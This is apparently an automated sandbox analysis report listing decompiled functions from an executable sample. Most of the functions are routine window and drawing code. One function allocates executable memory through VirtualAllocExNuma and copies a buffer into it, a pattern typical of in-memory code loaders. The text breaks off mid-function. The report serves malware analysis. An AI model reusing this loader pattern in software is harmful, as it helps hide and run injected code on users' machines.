0x00421a72
0x00421a62
0x00421a11
0x00421a19
0x00421a27
0x00421a1b
0x00421a1b
0x00421a1b
0x00421a41
0x00421a4b
0x00421a53
0x00421a58
0x00421a58
0x00000000
0x00421a53
0x004219fd
0x00421a02
0x00000000
0x00000000
0x00000000

APIs

SendMessageA.USER32 ref: 00421A41
UpdateWindow.USER32(?), ref: 00421A58
GetParent.USER32(?), ref: 00421AC3
PostMessageA.USER32 ref: 00421ADF

Strings

@, xrefs: 00421AAE

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction ID: c85c597f5e24639da506447a35e2af01adcbf593c53045394c0a427bdb2bd247
Opcode Fuzzy Hash: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction Fuzzy Hash: 6931B131702711AFDB304F60E848B6B77B5BF60315F51493FE55A562B1C779A881DB08

Uniqueness

Uniqueness Score: -1.00%

Function 00414364, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414364(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t25;
				void* _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t40;
				CHAR* _t42;

				_t42 = E004249C4() + 0x58;
				_t25 = E00424BFB();
				_t37 = _a8;
				_t40 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
				} else {
					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
				}
				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t40;
					_v44.hCursor = _t37;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t42;
					_t34 = E004142C3();
					_t50 = _t34;
					if(_t34 == 0) {
						E0041A6C8(_t50);
					}
				}
				return _t42;
			}

0x00414374
0x00414377
0x0041437c
0x0041437f
0x00414384
0x004143b6
0x00414390
0x0041439a
0x004143a0
0x004143cd
0x004143d5
0x004143dd
0x004143e2
0x004143e5
0x004143e8
0x004143eb
0x004143f4
0x004143f5
0x004143f8
0x004143fb
0x004143fe
0x00414401
0x00414406
0x00414408
0x0041440a
0x0041440a
0x00414408
0x00414415

APIs

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x, xrefs: 00414394
Afx:%x:%x:%x:%x:%x, xrefs: 004143B0

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: wsprintf$ClassInfo
String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
API String ID: 845911565-79760390
Opcode ID: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction ID: 0a19c2bbf351d913602cecefe87ed30b20bbc7f16e3ca44516e66fb3e2e9fa80
Opcode Fuzzy Hash: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction Fuzzy Hash: B3214271A0021DAF8F11EF95DC809DF7BB8EF48354B54402BF914E3251D3749A91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411BB7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411BB7(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t10;
				void* _t11;
				struct HWND__* _t13;
				struct HWND__* _t16;
				struct HWND__** _t23;
				void* _t24;

				_t23 = _a4;
				_t24 = __ecx;
				if(E00414007(__ecx, _t23) != 0) {
					L12:
					_t10 = 1;
					return _t10;
				}
				_t11 = E00414DCC(__ecx);
				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
					if(_t23[1] != 0x100) {
						L13:
						return E00415EEB(_t23);
					}
					_t13 = _t23[2];
					if(_t13 == 0x1b || _t13 == 3) {
						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E0041A7A3( *_t23, ?str?) == 0) {
							goto L13;
						} else {
							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

0x00411bb9
0x00411bbd
0x00411bc7
0x00411c3e
0x00411c40
0x00000000
0x00411c40
0x00411bcb
0x00411bd2
0x00411be5
0x00411c43
0x00000000
0x00411c46
0x00411be7
0x00411bed
0x00411c00
0x00000000
0x00411c12
0x00411c17
0x00411c1f
0x00411c38
0x00000000
0x00000000
0x00000000
0x00000000
0x00411c1f
0x00000000
0x00000000
0x00000000
0x00411bda
0x00000000
0x00411bda

APIs

GetWindowLongA.USER32 ref: 00411BF8
GetDlgItem.USER32 ref: 00411C17
IsWindowEnabled.USER32(00000000), ref: 00411C22
SendMessageA.USER32 ref: 00411C38

Strings

Edit, xrefs: 00411C02

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction ID: 51c9d298f70c0f27378d29b3ac4567bc27d580c5dbc93a390a738e7f39d54beb
Opcode Fuzzy Hash: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction Fuzzy Hash: F701A1303486116AEA341B26DD09BEBA764DB80755F14442BF601D56F4EB68D9C2869C

Uniqueness

Uniqueness Score: -1.00%

Function 004012BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004012BE(intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__** _t11;

				_v12 = 0;
				_v8 = 0;
				_t11 =  &_v8;
				_push(_t11);
				_push("kernel32.dll");
				_push(0);
				L0040C36A();
				if(_t11 != 0) {
					 *0x437ca8 = GetProcAddress(_v8, "VirtualAllocExNuma");
					_v12 =  *0x437ca8(GetCurrentProcess(), 0, _a8, 0x3000, 0x40, 0);
					E00405700(_v12, _a4, _a8);
				}
				return _v12;
			}

0x004012c4
0x004012cb
0x004012d2
0x004012d5
0x004012d6
0x004012db
0x004012dd
0x004012e4
0x004012f5
0x00401316
0x00401325
0x0040132a
0x00401333

APIs

GetModuleHandleExA.KERNEL32(00000000,kernel32.dll,00000000), ref: 004012DD
GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 004012EF
GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 00401309

Strings

VirtualAllocExNuma, xrefs: 004012E6
kernel32.dll, xrefs: 004012D6

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: VirtualAllocExNuma$kernel32.dll
API String ID: 4190356694-3151700105
Opcode ID: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction ID: ab771110a78a71b3a50b1cedd4e9fcdb71e2ffac9dc1a6c26221fcdacf48f8c9
Opcode Fuzzy Hash: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction Fuzzy Hash: C90136B5A40308BFDB10DFE4DC45F9E7BB8EB48715F509165FA04A72C0D7749A409BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2AB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A2AB(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x0041a2ad
0x0041a2b4
0x0041a2c0
0x0041a2c2
0x0041a2ca
0x0041a2dd
0x0041a2e1
0x0041a2e4
0x0041a2e4
0x0041a2cc
0x0041a2d5
0x0041a2d5
0x0041a2ee

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
SetLastError.KERNEL32(00000078,?,?,0041F6C9,00000000), ref: 0041A2E4

Strings

SetLayout, xrefs: 0041A2BA
GDI32.DLL, xrefs: 0041A2AF

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction ID: 1037135d2ca6d5ab5d4448aeed59ef973abf2fe16e9a43a6574f43dcbb056aca
Opcode Fuzzy Hash: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction Fuzzy Hash: D1E0D832701210FB82215719AC0895FBB52DBD4736BA98567F529C1290C7B9489286AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A275, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A275(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x0041a276
0x0041a289
0x0041a291
0x0041a29e
0x0041a2a1
0x0041a293
0x0041a298
0x0041a298
0x0041a2aa

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
SetLastError.KERNEL32(00000078), ref: 0041A2A1

Strings

GDI32.DLL, xrefs: 0041A278
GetLayout, xrefs: 0041A283

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
Instruction ID: 1954eb6f5355677032b0495d8726e370a05d23e30929425976ce774bf1de63f4
Opcode Fuzzy Hash: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
Instruction Fuzzy Hash: 38D05B31B42330EFC66027A4BD0D69A7B54DB08B6579502B7782ED22D0CBF85C4187ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041F691, Relevance: 7.8, APIs: 5, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041F691(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				long _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				intOrPtr _t150;
				intOrPtr* _t155;
				intOrPtr _t161;
				void* _t162;
				signed int _t165;
				signed int _t167;
				signed int _t171;
				signed int _t173;
				long _t191;
				intOrPtr* _t198;
				intOrPtr* _t200;
				long _t202;
				intOrPtr* _t209;
				intOrPtr* _t211;
				intOrPtr* _t214;
				long _t216;
				void* _t219;
				signed char _t222;
				intOrPtr _t225;
				intOrPtr _t236;
				intOrPtr _t242;
				char* _t248;
				struct tagRECT* _t263;
				intOrPtr* _t279;
				signed int _t281;
				long _t283;
				void* _t287;
				intOrPtr _t291;
				intOrPtr _t308;

				_t219 = __ecx;
				 *((intOrPtr*)(__ecx + 0x88)) = 1;
				E0041FF70(__ecx);
				_t279 = __ecx + 0x84;
				if((E0041A275( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
					E0041A2AB( *_t279, 0);
				}
				_t150 =  *((intOrPtr*)(_t219 + 0x68));
				_t222 =  *(_t150 + 0x64);
				if((_t222 & 0x00000004) == 0) {
					if((_t222 & 0x00000002) == 0) {
						GetWindowRect( *(_t150 + 0x1c),  &_v44);
						_t281 =  *(_t219 + 0x78) & 0x0000a000;
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						asm("sbb edx, edx");
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t248 =  &_v20;
						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
						_t225 =  *_t155;
						_v8 =  *((intOrPtr*)(_t155 + 4));
						if(_t281 == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t283 = _v44.left;
							asm("cdq");
							_v20 = _t225 + _t283;
							_v28 = _t283;
							_t250 = _v44.right - _t283 - _t248 >> 1;
							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
							_v24 = _t161;
							_v16 = _v8 + _t161;
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t291 = _v44.top;
							_v24 = _t291;
							asm("cdq");
							_t250 = _v44.bottom - _t291 - _t248 >> 1;
							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
							_v28 = _t191;
							_v20 = _t225 + _t191;
							_v16 = _v8 + _t291;
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t162 = _t219 + 0x48;
						_push(0);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t287 = 0xc40000;
						_push(0xc40000);
					} else {
						GetWindowRect( *(_t150 + 0x1c),  &_v60);
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
						_t236 = _v60.top;
						_v44.top = _t236;
						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
						_v16 =  *((intOrPtr*)(_t200 + 4));
						_t202 = _v60.left;
						_v44.right =  *_t198 + _t202;
						_v44.left = _t202;
						_t250 =  *_t200 + _t202;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v44.left = _t202;
						_v44.right =  *_t200 + _t202;
						_v44.top = _t236;
						_v44.bottom = _v16 + _t236;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						goto L6;
					}
				} else {
					GetWindowRect( *(_t150 + 0x1c),  &_v60);
					 *((intOrPtr*)(_t219 + 4)) = _a4;
					 *((intOrPtr*)(_t219 + 8)) = _a8;
					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
					_v12 =  *_t211;
					_v8 =  *((intOrPtr*)(_t211 + 4));
					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
					_t242 = _v60.top;
					_v44.top = _t242;
					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
					_v16 =  *((intOrPtr*)(_t214 + 4));
					_t216 = _v60.left;
					_v44.right =  *_t209 + _t216;
					_v44.left = _t216;
					_t250 =  *_t214 + _t216;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _v12 + _t216;
					_v44.top = _t242;
					_v44.bottom = _v8 + _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t308 = _v16 + _t242;
					_v44.left = _t216;
					_v8 = _t308;
					_v44.bottom = _t308;
					_v44.right = _t250;
					_v44.top = _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _t250;
					_v44.top = _t242;
					_v44.bottom = _v8;
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t287 = 0xc40000;
					_push(0);
					_push(0xc40000);
					_t162 = _t219 + 0x48;
				}
				_push(_t162);
				E004239AC();
				_push(0);
				_t263 = _t219 + 0x58;
				_push(_t287);
				_push(_t263);
				E004239AC();
				_t165 =  *0x439bf4; // 0x2
				_t167 =  *0x439bf0; // 0x2
				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
				_t171 =  *0x439bf4; // 0x2
				_t173 =  *0x439bf0; // 0x2
				InflateRect(_t263,  ~_t173,  ~_t171);
				_t264 = _a8;
				_t289 = _a4;
				E0041F5D0(_t219 + 0x28, _a4, _a8);
				E0041F5D0(_t219 + 0x38, _a4, _a8);
				E0041F5D0(_t219 + 0x48, _t289, _t264);
				E0041F5D0(_t219 + 0x58, _t289, _t264);
				 *((intOrPtr*)(_t219 + 0x74)) = E004201E2();
				E0041F9E4(_t219, _t289, _t264);
				return E00420341(_t219, _t250);
			}

0x0041f698
0x0041f69c
0x0041f6a6
0x0041f6b1
0x0041f6be
0x0041f6c4
0x0041f6c4
0x0041f6c9
0x0041f6cc
0x0041f6d2
0x0041f7bf
0x0041f879
0x0041f885
0x0041f890
0x0041f898
0x0041f89a
0x0041f8a6
0x0041f8ac
0x0041f8b2
0x0041f8b9
0x0041f8bc
0x0041f8fd
0x0041f8fe
0x0041f902
0x0041f903
0x0041f904
0x0041f90e
0x0041f911
0x0041f91c
0x0041f91f
0x0041f921
0x0041f928
0x0041f92b
0x0041f8be
0x0041f8c4
0x0041f8c5
0x0041f8c9
0x0041f8ca
0x0041f8cb
0x0041f8d3
0x0041f8d6
0x0041f8de
0x0041f8e0
0x0041f8e2
0x0041f8ea
0x0041f8f2
0x0041f8f2
0x0041f92e
0x0041f92f
0x0041f930
0x0041f931
0x0041f932
0x0041f93a
0x0041f93c
0x0041f93d
0x0041f93e
0x0041f93f
0x0041f946
0x0041f947
0x0041f948
0x0041f949
0x0041f94a
0x0041f94f
0x0041f7c5
0x0041f7cc
0x0041f7d8
0x0041f7de
0x0041f7eb
0x0041f803
0x0041f80b
0x0041f810
0x0041f816
0x0041f819
0x0041f81c
0x0041f824
0x0041f82a
0x0041f82d
0x0041f82f
0x0041f830
0x0041f831
0x0041f832
0x0041f839
0x0041f83a
0x0041f83b
0x0041f83c
0x0041f83d
0x0041f84b
0x0041f84e
0x0041f851
0x0041f854
0x0041f855
0x0041f856
0x0041f857
0x00000000
0x0041f85b
0x0041f6d8
0x0041f6df
0x0041f6eb
0x0041f6f1
0x0041f6fe
0x0041f716
0x0041f720
0x0041f72c
0x0041f734
0x0041f73c
0x0041f741
0x0041f747
0x0041f74a
0x0041f74d
0x0041f755
0x0041f75b
0x0041f75e
0x0041f760
0x0041f761
0x0041f762
0x0041f763
0x0041f76c
0x0041f76f
0x0041f777
0x0041f77a
0x0041f780
0x0041f781
0x0041f782
0x0041f783
0x0041f78a
0x0041f78c
0x0041f78f
0x0041f792
0x0041f798
0x0041f79b
0x0041f79e
0x0041f79f
0x0041f7a0
0x0041f7a1
0x0041f7a2
0x0041f7a8
0x0041f7ab
0x0041f7ae
0x0041f85e
0x0041f85e
0x0041f85f
0x0041f860
0x0041f861
0x0041f862
0x0041f867
0x0041f869
0x0041f86a
0x0041f86a
0x0041f950
0x0041f951
0x0041f956
0x0041f958
0x0041f95b
0x0041f95c
0x0041f95d
0x0041f962
0x0041f970
0x0041f97c
0x0041f97e
0x0041f986
0x0041f98f
0x0041f991
0x0041f994
0x0041f99d
0x0041f9a8
0x0041f9b3
0x0041f9be
0x0041f9ce
0x0041f9d1
0x0041f9e1

APIs

Part of subcall function 0041FF70: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
Part of subcall function 0041FF70: GetMessageA.USER32 ref: 0041FF9B
Part of subcall function 0041FF70: DispatchMessageA.USER32 ref: 0041FFAE
Part of subcall function 0041FF70: SetRectEmpty.USER32(?), ref: 0041FFD7
Part of subcall function 0041FF70: GetDesktopWindow.USER32 ref: 0041FFEF
Part of subcall function 0041FF70: LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
Part of subcall function 0041FF70: GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Part of subcall function 0041A275: GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
Part of subcall function 0041A275: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289

GetWindowRect.USER32 ref: 0041F6DF

Part of subcall function 0041A2AB: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
Part of subcall function 0041A2AB: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2

GetWindowRect.USER32 ref: 0041F7CC

Part of subcall function 0041F5D0: OffsetRect.USER32(?,?,?), ref: 0041F607

Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA0D
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA17
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA21
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA2B

Part of subcall function 00420341: GetCapture.USER32 ref: 00420352
Part of subcall function 00420341: SetCapture.USER32(?), ref: 00420362
Part of subcall function 00420341: GetCapture.USER32 ref: 0042036E
Part of subcall function 00420341: GetMessageA.USER32 ref: 00420388
Part of subcall function 00420341: DispatchMessageA.USER32 ref: 004203BA
Part of subcall function 00420341: GetCapture.USER32 ref: 00420418

GetWindowRect.USER32 ref: 0041F879
InflateRect.USER32(?,00000002,00000002), ref: 0041F97C
InflateRect.USER32(?,00000002,00000002), ref: 0041F98F

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
String ID:
API String ID: 2041477333-0
Opcode ID: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction ID: 42ddb03621f51a7623203be26b69d0316b25f3a5275469d587ef5c4032a932e9
Opcode Fuzzy Hash: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction Fuzzy Hash: 55D13671A006199FCF04CF98C880ADEBBB6EF49310F1581AAED05BB255D7B1AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004041B5, Relevance: 7.7, APIs: 5, Instructions: 237
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004041B5(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, signed int _a36, signed int _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t131;
				signed int _t230;
				void* _t267;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				_t131 = _a32;
				asm("cdq");
				_t230 = _t131 % _a40;
				_v12 = _t131 / _a40 + 1;
				_v16 = 0;
				while(1) {
					asm("cdq");
					if(_v16 >= _v12 - _t230 >> 1) {
						break;
					}
					_v20 = 0;
					while(_v20 < _v8 - _v16) {
						BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v16 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v16 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = 0;
					while(_v20 < _v12 - _v16) {
						BitBlt(_a16, _a20 + _a28 - (_v16 + 1) * _a40, _a24 + _v20 * _a40, _a40, _a40, _a4, _a8 + _a28 - (_v16 + 1) * _a40, _a12 + _v20 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = _v8 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + (_v20 - 1) * _a40, _a24 + _a32 - (_v16 + 1) * _a40, _a40, _a40, _a4, _a8 + (_v20 - 1) * _a40, _a12 + _a32 - (_v16 + 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
